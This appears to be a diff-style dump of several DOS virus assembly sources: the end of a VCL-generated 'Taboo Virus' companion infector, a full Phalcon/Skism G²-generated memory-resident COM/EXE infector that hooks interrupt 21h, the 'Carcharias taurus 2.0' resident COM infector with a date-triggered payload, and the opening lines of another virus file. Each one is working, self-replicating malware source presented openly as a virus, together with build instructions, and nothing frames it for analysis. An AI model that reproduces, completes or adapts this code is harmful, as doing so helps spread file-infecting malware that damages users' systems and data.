|
||||
|
||||
mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
push bx ; Save old DTA address
|
||||
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,128 ; Allocate 128 bytes on stack
|
||||
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
lea dx,[bp - 128] ; DX points to buffer
|
||||
int 021h
|
||||
|
||||
mov ah,04Eh ; DOS find first function
|
||||
mov cx,00010000b ; CX holds search attributes
|
||||
mov dx,offset all_files ; DX points to "*.*"
|
||||
int 021h
|
||||
jc leave_traverse ; Leave if no files present
|
||||
|
||||
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
|
||||
jne another_dir ; If not, try again
|
||||
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
|
||||
je another_dir ;If so, keep going
|
||||
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
lea dx,[bp - 98] ; DX points to new directory
|
||||
int 021h
|
||||
|
||||
call traverse ; Recursively call ourself
|
||||
|
||||
pushf ; Save the flags
|
||||
mov ah,03Bh ; DOS change directory function
|
||||
mov dx,offset up_dir ; DX points to parent directory
|
||||
int 021h
|
||||
popf ; Restore the flags
|
||||
|
||||
jnc done_searching ; If we infected then exit
|
||||
|
||||
another_dir: mov ah,04Fh ; DOS find next function
|
||||
int 021h
|
||||
jnc check_dir ; If found check the file
|
||||
|
||||
leave_traverse:
|
||||
mov dx,offset exe_mask ; DX points to "*.EXE"
|
||||
call find_files ; Try to infect a file
|
||||
done_searching: mov sp,bp ; Restore old stack frame
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
pop dx ; Retrieve old DTA address
|
||||
int 021h
|
||||
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
|
||||
up_dir db "..",0 ; Parent directory name
|
||||
all_files db "*.*",0 ; Directories to search for
|
||||
exe_mask db "*.EXE",0 ; Mask for all .EXE files
|
||||
traverse endp
|
||||
|
||||
db 075h,03Dh,0BDh,095h,0EAh
|
||||
|
||||
|
||||
find_files proc near
|
||||
push bp ; Save BP
|
||||
|
||||
mov ah,02Fh ; DOS get DTA function
|
||||
int 021h
|
||||
push bx ; Save old DTA address
|
||||
|
||||
mov bp,sp ; BP points to local buffer
|
||||
sub sp,128 ; Allocate 128 bytes on stack
|
||||
|
||||
push dx ; Save file mask
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
lea dx,[bp - 128] ; DX points to buffer
|
||||
int 021h
|
||||
|
||||
mov ah,04Eh ; DOS find first file function
|
||||
mov cx,00100111b ; CX holds all file attributes
|
||||
pop dx ; Restore file mask
|
||||
find_a_file: int 021h
|
||||
jc done_finding ; Exit if no files found
|
||||
call infect_file ; Infect the file!
|
||||
jnc done_finding ; Exit if no error
|
||||
mov ah,04Fh ; DOS find next file function
|
||||
jmp short find_a_file ; Try finding another file
|
||||
|
||||
done_finding: mov sp,bp ; Restore old stack frame
|
||||
mov ah,01Ah ; DOS set DTA function
|
||||
pop dx ; Retrieve old DTA address
|
||||
int 021h
|
||||
|
||||
pop bp ; Restore BP
|
||||
ret ; Return to caller
|
||||
find_files endp
|
||||
|
||||
db 0E7h,096h,07Dh,03Ch,0BEh
|
||||
|
||||
infect_file proc near
|
||||
mov ah,02Fh ; DOS get DTA address function
|
||||
int 021h
|
||||
mov di,bx ; DI points to the DTA
|
||||
|
||||
lea si,[di + 01Eh] ; SI points to file name
|
||||
mov dx,si ; DX points to file name, too
|
||||
mov di,offset spawn_name + 1; DI points to new name
|
||||
xor ah,ah ; AH holds character count
|
||||
transfer_loop: lodsb ; Load a character
|
||||
or al,al ; Is it a NULL?
|
||||
je transfer_end ; If so then leave the loop
|
||||
inc ah ; Add one to the character count
|
||||
stosb ; Save the byte in the buffer
|
||||
jmp short transfer_loop ; Repeat the loop
|
||||
transfer_end: mov byte ptr [spawn_name],ah; First byte holds char. count
|
||||
mov byte ptr [di],13 ; Make CR the final character
|
||||
|
||||
mov di,dx ; DI points to file name
|
||||
xor ch,ch ;
|
||||
mov cl,ah ; CX holds length of filename
|
||||
mov al,'.' ; AL holds char. to search for
|
||||
repne scasb ; Search for a dot in the name
|
||||
mov word ptr [di],'OC' ; Store "CO" as first two bytes
|
||||
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
|
||||
|
||||
mov byte ptr [set_carry],0 ; Assume we'll fail
|
||||
mov ax,03D00h ; DOS open file function, r/o
|
||||
int 021h
|
||||
jnc infection_done ; File already exists, so leave
|
||||
mov byte ptr [set_carry],1 ; Success -- the file is OK
|
||||
|
||||
mov ah,03Ch ; DOS create file function
|
||||
mov cx,00100111b ; CX holds file attributes (all)
|
||||
int 021h
|
||||
xchg bx,ax ; BX holds file handle
|
||||
|
||||
call encrypt_code ; Write an encrypted copy
|
||||
|
||||
mov ah,03Eh ; DOS close file function
|
||||
int 021h
|
||||
|
||||
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
|
||||
ret ; Return to caller
|
||||
|
||||
spawn_name db 12,12 dup (?),13 ; Name for next spawn
|
||||
set_carry db ? ; Set-carry-on-exit flag
|
||||
infect_file endp
|
||||
|
||||
|
||||
db 08Dh,0EDh,035h,0A0h,000h
|
||||
|
||||
get_cpu proc near
|
||||
mov dx,86 ; Assume it's an 8088/8086
|
||||
push sp
|
||||
pop ax
|
||||
cmp sp,ax
|
||||
jne get_cpu_end ; If the test failed then exit
|
||||
mov dx,286 ; Assume it's an 80286
|
||||
pushf
|
||||
pop ax
|
||||
or ax,04000h
|
||||
popf
|
||||
pushf
|
||||
pop ax
|
||||
test ax,04000h
|
||||
jne get_cpu_end ; If the test failed then exit
|
||||
mov dx,386 ; Assume it's an 80386
|
||||
.386c ; We have to use 386 instructions
|
||||
mov ebx,esp
|
||||
and esp,0FFFCh
|
||||
pushfd
|
||||
pop eax
|
||||
mov ecx,eax
|
||||
xor ax,0004h
|
||||
push eax
|
||||
popfd
|
||||
pushfd
|
||||
pop eax
|
||||
and eax,0004h
|
||||
and ecx,0004h
|
||||
cmp eax,ecx
|
||||
je is_386 ; If the test failed it's a 386
|
||||
mov dx,486 ; It must be a 80486 then
|
||||
is_386: push ecx
|
||||
popfd
|
||||
mov esp,ebx
|
||||
get_cpu_end: xchg dx,ax ; Transfer chip type to AX
|
||||
ret ; Return to caller
|
||||
get_cpu endp
|
||||
|
||||
db 0F6h,016h,05Ch,072h,084h
|
||||
|
||||
get_day proc near
|
||||
mov ah,02Ah ; DOS get date function
|
||||
int 021h
|
||||
mov al,dl ; Copy day into AL
|
||||
cbw ; Sign-extend AL into AX
|
||||
ret ; Return to caller
|
||||
get_day endp
|
||||
|
||||
db 0C6h,02Eh,047h,0ACh,053h
|
||||
|
||||
get_dos_version proc near
|
||||
mov ah,030h ; DOS get DOS version function
|
||||
int 021h
|
||||
mov bx,ax ; Save return value in BX
|
||||
xor bl,bl ; Clear DOS major version in BX
|
||||
xchg bh,bl ; Place 0 in BH, minor in BL
|
||||
cbw ; Sign-extend AL into AX
|
||||
mov cl,100 ; CL holds multiplier
|
||||
mul cl ; Multiply AL by 100
|
||||
add ax,bx ; Add back the minor version
|
||||
ret ; Return to caller
|
||||
get_dos_version endp
|
||||
|
||||
db 03Ah,06Fh,04Ah,03Dh,091h
|
||||
|
||||
get_minute proc near
|
||||
mov ah,02Ch ; DOS get time function
|
||||
int 021h
|
||||
mov al,cl ; Copy minute into AL
|
||||
cbw ; Sign-extend AL into AX
|
||||
ret ; Return to caller
|
||||
get_minute endp
|
||||
|
||||
db 02Ah,0D1h,031h,0C6h,081h
|
||||
|
||||
get_rollover proc near
|
||||
push es ; Save ES
|
||||
mov ax,040h ; Set the extra segment to
|
||||
mov es,ax ; 040h (ROM BIOS)
|
||||
mov al,byte ptr [0070h] ; AL holds rollover flag
|
||||
cbw ; Sign-extend AL into AX
|
||||
pop es ; Restore ES
|
||||
ret ; Return to caller
|
||||
get_rollover endp
|
||||
|
||||
data00 db "*.Dat"
|
||||
|
||||
vcl_marker db "[VCL]",0 ; VCL creation marker
|
||||
|
||||
|
||||
note db "Taboo Virus"
|
||||
db "Version 2.12"
|
||||
db "By Virucidal Maniac"
|
||||
|
||||
encrypt_code proc near
|
||||
mov si,offset encrypt_decrypt; SI points to cipher routine
|
||||
|
||||
xor ah,ah ; BIOS get time function
|
||||
int 01Ah
|
||||
mov word ptr [si + 8],dx ; Low word of timer is new key
|
||||
|
||||
xor byte ptr [si],1 ;
|
||||
xor byte ptr [si + 7],1 ; Change all SIs to DIs
|
||||
xor word ptr [si + 10],0101h; (and vice-versa)
|
||||
|
||||
mov di,offset finish ; Copy routine into heap
|
||||
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
|
||||
push si ; Save SI for later
|
||||
push cx ; Save CX for later
|
||||
rep movsb ; Copy the bytes
|
||||
|
||||
mov si,offset write_stuff ; SI points to write stuff
|
||||
mov cx,5 ; CX holds length of write
|
||||
rep movsb ; Copy the bytes
|
||||
|
||||
pop cx ; Restore CX
|
||||
pop si ; Restore SI
|
||||
inc cx ; Copy the RET also this time
|
||||
rep movsb ; Copy the routine again
|
||||
|
||||
mov ah,040h ; DOS write to file function
|
||||
mov dx,offset start ; DX points to virus
|
||||
|
||||
call finish ; Encrypt/write/decrypt
|
||||
|
||||
ret ; Return to caller
|
||||
|
||||
write_stuff: mov cx,finish - start ; Length of code
|
||||
int 021h
|
||||
encrypt_code endp
|
||||
|
||||
end_of_code label near
|
||||
|
||||
encrypt_decrypt proc near
|
||||
mov si,offset start_of_code ; SI points to code to decrypt
|
||||
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
|
||||
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
|
||||
inc si ; Do the next word
|
||||
inc si ;
|
||||
loop xor_loop ; Loop until we're through
|
||||
ret ; Return to caller
|
||||
encrypt_decrypt endp
|
||||
finish label near
|
||||
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,313 @@
|
|||
; Virus generated by Gý 0.70á
|
||||
; Gý written by Dark Angel of Phalcon/Skism
|
||||
|
||||
; File: TARGET.ASM
|
||||
; [Gý Virus] by Phalcon/Skism
|
||||
|
||||
checkres1 = 'FF'
|
||||
checkres2 = 'FF'
|
||||
id = 'FF'
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
|
||||
; Assemble with:
|
||||
; TASM /m3 filename.ASM
|
||||
; TLINK filename.OBJ
|
||||
; EXE2BIN filename.EXE filename.COM
|
||||
org 0000h
|
||||
|
||||
start:
|
||||
call next
|
||||
next:
|
||||
pop bp
|
||||
sub bp, offset next
|
||||
|
||||
push es
|
||||
push ds
|
||||
|
||||
mov ax, checkres1 ; Installation check
|
||||
int 0021h
|
||||
cmp ax, checkres2 ; Already installed?
|
||||
jz done_install
|
||||
|
||||
mov ah, 004Ah ; alter memory allocation
|
||||
mov bx, 0FFFFh ; of segment at ES
|
||||
int 0021h
|
||||
|
||||
sub bx, (endheap-start+15)/16+1
|
||||
mov ah, 004Ah ; alter memory allocation
|
||||
int 0021h
|
||||
jc done_install
|
||||
sub word ptr ds:[0002h], (endheap-start+15)/16+1
|
||||
|
||||
mov ah, 0048h ; Allocate memory for the virus
|
||||
mov bx, (endheap-start+15)/16
|
||||
int 0021h
|
||||
jc done_install
|
||||
|
||||
mov es, ax
|
||||
dec ax
|
||||
mov ds, ax ; Get MCB
|
||||
|
||||
mov byte ptr ds:[0000h], 'Z' ; Mark end of chain
|
||||
mov word ptr ds:[0001h], 0008h ; Mark owner = DOS
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
xor di, di
|
||||
mov cx, (heap-start)/2+1 ; Bytes to move
|
||||
mov si, bp ; lea si,[bp+offset start]
|
||||
rep movsw
|
||||
|
||||
xor ax, ax
|
||||
mov ds, ax
|
||||
push ds
|
||||
lds ax, ds:[21h*4] ; Get old int handler
|
||||
mov word ptr es:oldint21, ax
|
||||
mov word ptr es:oldint21+2, ds
|
||||
pop ds
|
||||
mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
|
||||
mov ds:[21h*4+2], es ; in high memory
|
||||
|
||||
done_install:
|
||||
pop es
|
||||
pop ds
|
||||
cmp sp, id
|
||||
jne restore_COM
|
||||
restore_EXE:
|
||||
mov ax, es
|
||||
add ax, 0010h
|
||||
add cs:[bp+word ptr origCSIP+2], ax
|
||||
add ax, cs:[bp+word ptr origSPSS]
|
||||
cli
|
||||
mov ss, ax
|
||||
mov sp, cs:[bp+word ptr origSPSS+2]
|
||||
sti
|
||||
db 00EAh
|
||||
origCSIP db ?
|
||||
old3 db 0cdh,20h,0
|
||||
origSPSS dd ?
|
||||
|
||||
restore_COM:
|
||||
mov di, 0100h
|
||||
push di
|
||||
lea si, [bp+offset old3]
|
||||
movsw
|
||||
movsb
|
||||
ret
|
||||
|
||||
INT24:
|
||||
mov al, 0003h
|
||||
iret
|
||||
|
||||
int21:
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
cmp ax, 4B00h ; execute?
|
||||
jz execute
|
||||
return:
|
||||
jmp exitint21
|
||||
execute:
|
||||
mov word ptr cs:filename, dx
|
||||
mov word ptr cs:filename+2, ds
|
||||
mov ax, 3524h
|
||||
int 0021h
|
||||
push es
|
||||
push bx
|
||||
|
||||
lea dx, INT24 ; ASSumes ds=cs
|
||||
mov ax, 2524h
|
||||
int 0021h
|
||||
|
||||
push cs
|
||||
pop es
|
||||
|
||||
|
||||
mov bx, dx
|
||||
cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM
|
||||
jz return ; Exit if so
|
||||
|
||||
lds dx, cs:filename
|
||||
mov ax, 4300h
|
||||
int 0021h
|
||||
jc return
|
||||
push cx
|
||||
push ds
|
||||
push dx
|
||||
|
||||
mov ax, 4301h ; clear file attributes
|
||||
push ax ; save for later use
|
||||
xor cx, cx
|
||||
int 0021h
|
||||
|
||||
mov ax, 3D02h
|
||||
lds dx, cs:filename
|
||||
int 0021h
|
||||
xchg ax, bx
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
|
||||
mov ax, 5700h ; get file time/date
|
||||
int 0021h
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov ah, 003Fh
|
||||
mov cx, 001Ah
|
||||
mov dx, offset readbuffer
|
||||
int 0021h
|
||||
|
||||
mov ax, 4202h
|
||||
xor cx, cx
|
||||
cwd
|
||||
int 0021h
|
||||
|
||||
cmp word ptr [offset readbuffer], 'ZM'
|
||||
jz checkEXE
|
||||
|
||||
mov cx, word ptr [offset readbuffer+1] ; jmp location
|
||||
add cx, heap-start+3 ; convert to filesize
|
||||
cmp ax, cx ; equal if already infected
|
||||
jz jmp_close
|
||||
|
||||
cmp ax, 65535-(endheap-start) ; check if too large
|
||||
ja jmp_close ; Exit if so
|
||||
|
||||
mov si, offset readbuffer
|
||||
mov di, offset old3
|
||||
movsb
|
||||
movsw
|
||||
|
||||
mov cx, 0003h
|
||||
sub ax, cx
|
||||
mov word ptr [offset readbuffer+1], ax
|
||||
mov dl, 00E9h
|
||||
mov byte ptr [offset readbuffer], dl
|
||||
jmp short continue_infect
|
||||
checkEXE:
|
||||
cmp word ptr [offset readbuffer+10h], id
|
||||
jnz skipp
|
||||
jmp_close:
|
||||
jmp close
|
||||
skipp:
|
||||
|
||||
lea si, readbuffer+14h
|
||||
lea di, origCSIP
|
||||
movsw ; Save original CS and IP
|
||||
movsw
|
||||
|
||||
sub si, 000Ah
|
||||
movsw ; Save original SS and SP
|
||||
movsw
|
||||
|
||||
push bx ; save file handle
|
||||
mov bx, word ptr [readbuffer+8] ; Header size in paragraphs
|
||||
mov cl, 0004h
|
||||
shl bx, cl
|
||||
|
||||
push dx ; Save file size on the
|
||||
push ax ; stack
|
||||
|
||||
sub ax, bx ; File size - Header size
|
||||
sbb dx, 0000h ; DX:AX - BX -> DX:AX
|
||||
|
||||
mov cx, 0010h
|
||||
div cx ; DX:AX/CX = AX Remainder DX
|
||||
|
||||
mov word ptr [readbuffer+14h], dx ; IP Offset
|
||||
mov word ptr [readbuffer+10h], id ; Initial SP
|
||||
mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment
|
||||
mov word ptr [readbuffer+16h], ax ; Para disp CS in module.
|
||||
|
||||
pop ax ; Filelength in DX:AX
|
||||
pop dx
|
||||
|
||||
add ax, heap-start
|
||||
adc dx, 0000h
|
||||
|
||||
mov cl, 0009h
|
||||
push ax
|
||||
shr ax, cl
|
||||
ror dx, cl
|
||||
stc
|
||||
adc dx, ax
|
||||
pop ax
|
||||
and ah, 0001h
|
||||
|
||||
mov word ptr [readbuffer+4], dx ; Fix-up the file size in
|
||||
mov word ptr [readbuffer+2], ax ; the EXE header.
|
||||
|
||||
pop bx ; restore file handle
|
||||
mov cx, 001Ah
|
||||
|
||||
continue_infect:
|
||||
push cx ; save # bytes to write
|
||||
|
||||
mov cx, heap-start
|
||||
mov ah, 0040h ; concatenate virus
|
||||
mov dx, offset start
|
||||
int 0021h
|
||||
|
||||
xor dx, dx
|
||||
xor cx, cx
|
||||
mov ax, 4200h
|
||||
int 0021h
|
||||
|
||||
|
||||
pop cx
|
||||
mov ah, 0040h
|
||||
mov dx, offset readbuffer
|
||||
int 0021h
|
||||
|
||||
|
||||
close:
|
||||
mov ax, 5701h ; restore file time/date
|
||||
pop dx
|
||||
pop cx
|
||||
int 0021h
|
||||
|
||||
mov ah, 003Eh
|
||||
int 0021h
|
||||
|
||||
pop ax ; restore file attributes
|
||||
pop dx ; get filename and
|
||||
pop ds
|
||||
pop cx ; attributes from stack
|
||||
int 0021h
|
||||
|
||||
pop dx
|
||||
pop ds
|
||||
mov ax, 2524h
|
||||
int 0021h
|
||||
|
||||
exitint21:
|
||||
pop es
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
db 00EAh ; return to original handler
|
||||
oldint21 dd ?
|
||||
|
||||
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
|
||||
creator db 'Phalcon/Skism',0
|
||||
virusname db '[Gý Virus]',0
|
||||
|
||||
heap:
|
||||
filename dd ?
|
||||
readbuffer db 1ah dup (?)
|
||||
endheap:
|
||||
end start
|
|
@ -0,0 +1,378 @@
|
|||
TITLE The Carcharias taurus 2.0
|
||||
.MODEL Tiny
|
||||
.CODE
|
||||
.STARTUP
|
||||
|
||||
; Some Constants -------------------------------------------------------------
|
||||
DogSize equ 584-16-6
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
db 0E9h ; JMP Loader
|
||||
dw 3
|
||||
db 0
|
||||
dw 0256h
|
||||
; ************************** DOG LOADER **************************************
|
||||
Loader:
|
||||
|
||||
call GetBP ; Get BP
|
||||
GetBP: pop BP
|
||||
sub BP, 103h
|
||||
push AX ; Save AX
|
||||
|
||||
; Find Z-MCB -----------------------------------------------------------------
|
||||
mov AH, 52h
|
||||
int 21h
|
||||
|
||||
mov DX, ES:[BX-2]
|
||||
mov DI, (OFFSET Place)-6
|
||||
mov DS:[BP+DI], DX
|
||||
|
||||
NEXT0:
|
||||
mov DI, (OFFSET Place)-6
|
||||
mov ES, DS:[BP+DI]
|
||||
mov DX, ES:[3] ; Calc the next MCB seg
|
||||
inc DX
|
||||
add DS:[BP+DI], DX
|
||||
|
||||
cmp ES:[0], byte ptr 'Z'
|
||||
jne NEXT0
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Looking for the Dog behind Z-MCB -------------------------------------------
|
||||
push ES
|
||||
mov DX, ES
|
||||
add DX, ES:[3]
|
||||
inc DX
|
||||
mov ES, DX
|
||||
mov DX, ES:[3]
|
||||
pop ES
|
||||
cmp DX, 815Dh ; 815Dh - Dog's bytes
|
||||
je LExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Eat 1K in the Z-MCB, Current PSP, BIOS Data --------------------------------
|
||||
|
||||
push DS
|
||||
sub ES:[3], word ptr 40h ; Dec Z-MCB
|
||||
|
||||
mov AH, 62h
|
||||
int 21h
|
||||
mov DS, BX
|
||||
sub DS:[2], word ptr 40h ; Dec Curr PSP
|
||||
|
||||
xor DX, DX
|
||||
mov DS, DX
|
||||
dec word ptr DS:[413h]
|
||||
|
||||
pop DS
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Calculate Dog's segment adress ---------------------------------------------
|
||||
mov DX, CS
|
||||
add DX, ES:[3]
|
||||
mov ES, DX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Now load the Dog -----------------------------------------------------------
|
||||
xor DI, DI
|
||||
mov SI, BP
|
||||
add SI, 100h
|
||||
mov CX, DogSize
|
||||
cld
|
||||
rep movsb
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Hook 21h -------------------------------------------------------------------
|
||||
; Get old vector
|
||||
push ES
|
||||
mov AX, 3521h
|
||||
int 21h
|
||||
mov DX, ES
|
||||
pop ES
|
||||
mov DI, (OFFSET Exit21h)-100h-6+1
|
||||
mov ES:[DI], BX
|
||||
inc DI
|
||||
inc DI
|
||||
mov ES:[DI], DX
|
||||
|
||||
; Set 21h to Dog
|
||||
mov AX, 2521h
|
||||
mov DX, (OFFSET Dog)-100h-6
|
||||
push DS
|
||||
push ES
|
||||
pop DS
|
||||
int 21h
|
||||
pop DS
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Loader Exit ----------------------------------------------------------------
|
||||
LExit:
|
||||
; Restore first 6 bytes
|
||||
mov DI, (OFFSET M_6Bytes)-6
|
||||
mov AX, word ptr DS:[BP+DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov BX, word ptr DS:[BP+DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov CX, word ptr DS:[BP+DI]
|
||||
mov word ptr CS:[100h], AX
|
||||
mov word ptr CS:[102h], BX
|
||||
mov word ptr CS:[104h], CX
|
||||
|
||||
; Restore all registers
|
||||
pop AX
|
||||
xor BX, BX
|
||||
xor CX, CX
|
||||
xor DI, DI
|
||||
xor SI, SI
|
||||
xor BP, BP
|
||||
mov DX, 100h
|
||||
push DX
|
||||
xor DX, DX
|
||||
push DS
|
||||
pop ES
|
||||
ret
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; ************************** END of DOG LOADER *******************************
|
||||
|
||||
|
||||
; ******************************* DOG **************************************
|
||||
Dog:
|
||||
pushf
|
||||
cmp AX, 4B00h
|
||||
je D01
|
||||
jmp QuickExit
|
||||
D01: push AX
|
||||
push BX
|
||||
push CX
|
||||
push DX
|
||||
push DI
|
||||
push SI
|
||||
push DS
|
||||
push ES
|
||||
|
||||
push DX ; Store file name
|
||||
push DS
|
||||
|
||||
|
||||
; Effect ? -------------------------------------------------------------------
|
||||
mov AH, 2Ah
|
||||
int 21h
|
||||
cmp CX, 1993 ; After 1992
|
||||
jb EExit
|
||||
cmp DH, 1 ; Jan,
|
||||
jne EExit
|
||||
mov AH, 2Ch
|
||||
int 21h
|
||||
cmp CH, 14
|
||||
jne EExit
|
||||
cmp CL, 30
|
||||
jb EExit
|
||||
; yes!
|
||||
push CS
|
||||
pop DS
|
||||
mov CX, 20
|
||||
mov AH, 2
|
||||
mov SI, (OFFSET Tired)-100h-6
|
||||
CHN: mov DL, byte ptr DS:[SI]
|
||||
inc SI
|
||||
dec DL
|
||||
int 21h
|
||||
loop CHN
|
||||
; cli
|
||||
; hlt
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
EExit:
|
||||
; Store old int 24h vector ---------------------------------------------------
|
||||
mov AX, 3524h ; Get intrpt vector (ES:BX)
|
||||
int 21h
|
||||
mov DI, (OFFSET Old24h)-100h-6
|
||||
mov CS:[DI], BX ; Store BX
|
||||
inc DI
|
||||
inc DI
|
||||
mov CS:[DI], ES ; Store ES
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Set new int 24h handler ----------------------------------------------------
|
||||
mov AX, 2524h ; Set intrpt vector (DS:DX)
|
||||
mov DX, (OFFSET INT24)-100h-6
|
||||
push CS
|
||||
pop DS
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; -----------------------------------------------------
|
||||
pop DS
|
||||
pop DX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Open the file --------------------------------------------------------------
|
||||
mov AX, 3D02h
|
||||
int 21h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov CS:[DI], AX
|
||||
jnc D02
|
||||
jmp DExit
|
||||
D02:
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Read 1st 6 bytes -----------------------------------------------------------
|
||||
push CS
|
||||
pop DS
|
||||
mov AH, 3Fh
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov DX, (OFFSET M_6Bytes)-100h-6
|
||||
mov CX, 6
|
||||
int 21h
|
||||
jnc D03
|
||||
jmp DExit
|
||||
|
||||
D03:
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Check File Format ----------------------------------------------------------
|
||||
mov DI, (OFFSET M_6Bytes)-100h-6
|
||||
cmp CS:[DI], 4D5Ah
|
||||
jne D04
|
||||
jmp DExit
|
||||
D04: cmp CS:[DI], 5A4Dh
|
||||
je DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Check File for Dog ---------------------------------------------------------
|
||||
cmp CS:[DI+3], 0256h
|
||||
je DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Get and Store file Date&Time -----------------------------------------------
|
||||
mov AX, 5700h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
int 21h
|
||||
mov DI, (OFFSET FDate)-100h-6
|
||||
mov CS:[DI], DX
|
||||
inc DI
|
||||
inc DI
|
||||
mov CS:[DI], CX
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Get and Store file Size ----------------------------------------------------
|
||||
mov AX, 4202h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
xor DX, DX
|
||||
xor CX, CX
|
||||
int 21h
|
||||
mov DI, (OFFSET FSize)-100h-6
|
||||
sub AX, 3
|
||||
mov CS:[DI], AX
|
||||
cmp AX, 64512
|
||||
ja DExit
|
||||
cmp AX, 6
|
||||
jb DExit
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Add Dog to the file --------------------------------------------------------
|
||||
push CS
|
||||
pop DS
|
||||
mov AH, 40h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov CX, DogSize
|
||||
xor DX, DX
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Write 1st 6 bytes to file --------------------------------------------------
|
||||
; Move file ptr to the start
|
||||
mov AX, 4200h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
xor DX, DX
|
||||
xor CX, CX
|
||||
int 21h
|
||||
; Write ...
|
||||
mov AH, 40h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov CX, 6
|
||||
mov DX, (OFFSET DogCall)-100h-6
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
DExit:
|
||||
|
||||
; Set file Date&Time ---------------------------------------------------------
|
||||
mov AX, 5701h
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
mov DI, (OFFSET FDate)-100h-6
|
||||
mov DX, CS:[DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov CX, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; Close the file -------------------------------------------------------------
|
||||
mov AH, 3Eh
|
||||
mov DI, (OFFSET Handle)-100h-6
|
||||
mov BX, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
; Restore int 24h ------------------------------------------------------------
|
||||
mov AX, 2524h ; Set intrpt vector (DS:DX)
|
||||
mov DI, (OFFSET Old24h)-100h-6
|
||||
mov DX, CS:[DI]
|
||||
inc DI
|
||||
inc DI
|
||||
mov DS, CS:[DI]
|
||||
int 21h
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
pop ES
|
||||
pop DS
|
||||
pop SI
|
||||
pop DI
|
||||
pop DX
|
||||
pop CX
|
||||
pop BX
|
||||
pop AX
|
||||
|
||||
QuickExit: popf
|
||||
Exit21h: db 0EAh
|
||||
Int21hIP: dw 0 ; BX
|
||||
Int21hCS: dw 0 ; ES
|
||||
|
||||
; Int 24h handler ------------------------------------------------------------
|
||||
INT24: xor al, al ; Ignore critical error
|
||||
iret
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; **************************** END of DOG **********************************
|
||||
|
||||
DogData:
|
||||
M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h
|
||||
Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11
|
||||
DogCall db 0E9h
|
||||
FSize dw 0606h
|
||||
Sign db 'V', 2
|
||||
Handle dw 0606h
|
||||
Vers dw 0606h
|
||||
FDate dw 0606h, 0606h ; Date, Time
|
||||
Old24h dw 0606h, 0606h ; BX:ES
|
||||
Attrib dw 0606h
|
||||
Place dw 0606h
|
||||
END
|
||||
|
|
@ -0,0 +1,278 @@
|
|||
cr equ 13 ; This VIRUS was written 12-14-1992
|
||||
lf equ 10 ; AND QUIT READING MY SOURCE CODE
|
||||
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
|
||||
